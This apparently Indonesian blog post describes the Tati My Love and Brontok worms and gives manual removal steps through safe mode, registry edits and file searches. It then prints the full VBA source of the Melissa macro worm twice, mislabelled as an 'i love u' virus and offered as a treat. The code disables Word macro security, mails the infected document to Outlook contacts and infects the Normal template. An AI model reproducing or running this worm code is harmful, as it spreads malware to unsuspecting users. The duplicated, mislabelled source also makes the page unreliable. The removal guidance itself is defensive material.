Jika sudah menginfeksi komputer, virus ini akan membuat beberapa file induk dengan nama tati.exe di 2 lokasi yaitu di C:\Windows dan C:\Documents and Settings\All Users\Start Menu\Programs\Startup.
Virus ini juga akan membuat string pada beberapa registry, sehingga jika user mengakses ke Drive maka secara tidak langsung akan menjalankan virus. Untuk varian awalnya, Tati My Love tidak akan melakukan blok terhadap fungsi Windows sehingga lebih mudah untuk dibersihkan.
Memalsukan diri sebagai folder
Perlu diwaspadai juga, jika Anda menemukan folder yang agak aneh di dalam flash disk, seperti folder dengan ekstensi SCR, dengan type “Screensaver” dan ukuran 198 KB, sebaiknya jangan dieksekusi karena virus ini akan melakukan penipuan dengan membuat file duplikat di dalam flash disk tersebut pada setiap folder dan subfolder.
Perlu diketahui, folder yang asli tidak akan memiliki ukuran (size), tipe dan tidak memiliki ekstensi. File duplikat yang dibuat akan mempunyai nama file yang sama dengan nama folder aslinya tetapi mempunyai ekstensi .SCR (screen saver) sedangkan folder asli tersebut akan disembunyikan.
Tati My Love juga akan membuat file Autorun.inf dan file tati.exe pada flash disk dengan tujuan agar virus dapat aktif secara otomatis dengan hanya mencolokkan flash disk tersebut ke komputer. File Autorun.inf ini berisi script untuk menjalankan file tati.exe tersebut.
Tati My Love pun akan membuat sebuah file dengan nama tati.my.love.txt yang berisi ungkapan perasaan kepada sang kekasih dengan bunyi seperti ini:
Duhai Adinda tercinta —-
Perjalanan tiga hari tiga malam mengarungi samudera
——-Seumur hidup diri ini takkan lupa
Virus ini bertipe worm (dapat menduplikasi diri), dan menyebar melalui attachment email (email virus). Nama lain virus: brorontok, Rontokbro,..
Virus ini kira2 pertama kali menyebar di bulan September 2005, dibuat oleh
orang Indonesia karena signature email nya berbahasa Indonesia
dan juga saya melihat isi virus dalam binari dan dan menemukan
nama-nama fungsi dalam kode ascii merupakan kata-kata bahasa Indonesia
seperti keluarDOng(), dsb…
Alasan saya menulis artikel ini adalah karena banyaknya teman-teman
saya yang terkena virus ini
==========================================================
Langkah-langkah membersihkan komputer dari virus Barontok:
==========================================================
(Untuk win 95, 98, ME)
- Masuk ke safe mode: Reboot lalu setelahh muncul tampilan bios
tekan Ctrl, pilih Safe mode dan tekan enter
- Lanjut langsung mulai dari langkah 5
(Untuk windows ME dan XP)
Matikan System Restore Windows
Start->Settings->Control panel->System atau
Start->Control PAnel->System
pada System restore tab… pilih opsi “Turn off System Restore”
(Untuk Win 2000, XP Home/Pro, Server 2003)
1. Reboot dan masuk ke safe mode.
** Restart windows, setelah muncul tampilan BIOS tekan F8, akan ad
pilihan: Safe mode, Normal,…. pilih safe mode lalu tekan enter
2. Setelah itu masuk windows dengan login administrator atau user lain yang
mempunyai auth sebagai administrator,
3. Buat User account baru DENGAN account type: Computer Administrator
lalu logoff dan login dengan account yang baru dibuat.
——————————————
Menghilangkan autostart virus di registry
——————————————
4. Buka regedit: Start menu->Run->Regedit.exe lalu tekan enter
Di panel kiri pilih key:
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Run
lalu di panel kanan, hapus key:
Bron-Spizaetus = “……..”
Di panel kiri pilih key:
HKEY_CURRENT_USER>Software>Microsoft>Windows>CurrentVersion>Run
lalu di panel kanan, hapus key:
Tok-Cirrhatus = “……”
** Catatan:
Jika regedit tidak dapat dibuka (muncul pesan error).. ini merupakan
salah satu akibat virus barontok.
Untuk itu saya telah membuat file untuk mengatasi masalah tsb:
Download file PatchRegKey.inf (600 Bytes) di :
http://students.if.itb.ac.id/~if12031/kios/PatchRegKey.inf
Setelah di download, klik kanan file tsb lalu pilih “Install..”
lalu lanjutkan langkah 4.
————————————————
Menghilangkan autostart virus di scheduled task
————————————————
5. Buka Secheduled Task di Control Panel:
Start->Settings->Control Panel->Scheduled Task lalu tekan enter
Hapus task dengan nama “At1″ atau apapun yang berhubungan dengan virus.
Tips: Klik kanan task->properties, lalu lihat isi properties dan jika
ad isi command yang mencurigakan contoh: BArontok.com , dsb.. hapus
task tersebut.
———————————————————
Cari dan Hapus file-file virus di seluruh drive komputer
———————————————————
6. Aktifkan opsi Show hidden Files dan Ekstensi:
Start->Settings->Control panel atau
Start->Control Panel
Klik Folder Options dan pada Tab view aktifkan opsi:
1. Show hidden files&Folders
dan matikan opsi
2. Hide Extensions for known file types
3. Hide Protected Operating System
7. Gunakan Search File Windows:
Start->Search lalu tekan enter
Cari di seluruh drive windows yang ad: C,D, ….
pada input Search for files or folders names masukkan:
*.exe
lalu pada search options pilih opsi Range Size-> At most: 81 Kb
dan pada Advanced Options pilih opsi Search system folders,
search hidden files&folders, search subfolders
pilihan lain biarkan kosong
Lalu klik search now..
Pada hasil pencarian di panel kanan hapus semua file yang:
1. berukuran TEPAT 80 kb DAN
2. file nya berekstensi *.exe / *.pif / *.com / *.bat DAN
3. File nya memiliki icon folder/direktori windows
** perhatian: hapus hanya file yang memenuhi SEMUA kondisi di atas
dan BUKAN yang memenuhi salah satu saja.
(File yang sering ditemukan: Barontok.com, ElnorB.exe ,cari file ini)
* Tips: Sort hasil pencarian berdasarkan size untuk memudahkan
penghapusan
* Catatan: Cara ini merupakan cara heuristic berdasarkan pengalaman
dan eksperimen (e.g: ditemukan bahwa virus tsb berukuran 80 Kb),
dipilih untuk pencarian lebih cepat dibandingkan melihat pattern file
satu2 secara manual
** Sorry, i don’t have time to write the removal program now
maybe next time
7. Ulangi langkah ke-7 atas dengan input search file: *.pif, *.com, *.bat
————-
Finishing
————-
8. Jika ada, Hapus semua shortcut virus Startup Menu di
setiap account profile:
C:/Document Settings/nama_profile/Start Menu/Programs/Startup
** Saran: jika memungkinkan misal pada komputer pribadi dan bukan
multi user, hapus user account selain user account
yang dibuat pada langkah 3 di atas (misal:Administrator,…).
9. Reboot dan masuk windows seperti biasa.
Catatan:
Cara ini sudah BERHASIL diterapkan di banyak komputer
(pastikan Anda sudah mengikuti semua langkah di atas)
—
END
—
berikut ini adalah source code dari virus mellisa dimana dibuat dengan VBS, mau tau so nikmati sajian ini
source code i love u
by : badboy
suntingan : virologi
Private Sub AutoOpen()
On Error Resume Next
p$ = “clone”
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “” Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else
p$ = “clone”
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1): Options.SaveNormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “… by Kwyjibo” Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = “Important Message From ” & Application.UserName
BreakUmOffASlice.Body = “Here is that document you asked for … don’t show anyone else
“
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = “”
Next y
DasMapiName.Logoff
End If
p$ = “clone”
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) = “… by Kwyjibo”
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> “Melissa” Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = “Melissa”
DoAD = True
End If
If NTI1.Name <> “Melissa” Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = “Melissa”
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = “”
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString (“Private Sub Document_Close()”)
Do While ADI1.CodeModule.Lines(BGN, 1) <> “”
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = “clone”
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = “”
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString (“Private Sub Document_Open()”)
Do While NTI1.CodeModule.Lines(BGN, 1) <> “”
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, “Document”) = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, “Document”) <> False) Then
ActiveDocument.Saved = True: End If
‘WORD/Melissa written by Kwyjibo
‘Clone written by Duke/SMF
‘Works in both Word 2000 and Word 97
‘Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
‘Word -> Email | Word 97 <–> Word 2000 … it’s a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game’s over. I’m outta here.”
End Sub
source code i love u
by : badboy
suntingan : virologi
Private Sub AutoOpen()
On Error Resume Next
p$ = “clone”
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) <> “” Then
CommandBars(“Macro”).Controls(“Security…”).Enabled = False
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, “Level”) = 1&
Else
p$ = “clone”
CommandBars(“Tools”).Controls(“Macro”).Enabled = False
Options.ConfirmConversions = (1 – 1): Options.VirusProtection = (1 – 1): Options.SaveNormalPrompt = (1 – 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject(“Outlook.Application”)
Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)
If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “… by Kwyjibo” Then
If UngaDasOutlook = “Outlook” Then
DasMapiName.Logon “profile”, “password”
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = “Important Message From ” & Application.UserName
BreakUmOffASlice.Body = “Here is that document you asked for … don’t show anyone else
“BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = “”
Next y
DasMapiName.Logoff
End If
p$ = “clone”
System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) = “… by Kwyjibo”
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> “Melissa” Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = “Melissa”
DoAD = True
End If
If NTI1.Name <> “Melissa” Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = “Melissa”
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = “”
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString (“Private Sub Document_Close()”)
Do While ADI1.CodeModule.Lines(BGN, 1) <> “”
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = “clone”
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = “”
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString (“Private Sub Document_Open()”)
Do While NTI1.CodeModule.Lines(BGN, 1) <> “”
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, “Document”) = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, “Document”) <> False) Then
ActiveDocument.Saved = True: End If
‘WORD/Melissa written by Kwyjibo
‘Clone written by Duke/SMF
‘Works in both Word 2000 and Word 97
‘Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
‘Word -> Email | Word 97 <–> Word 2000 … it’s a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText “Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game’s over. I’m outta here.”
End Sub
Posting Komentar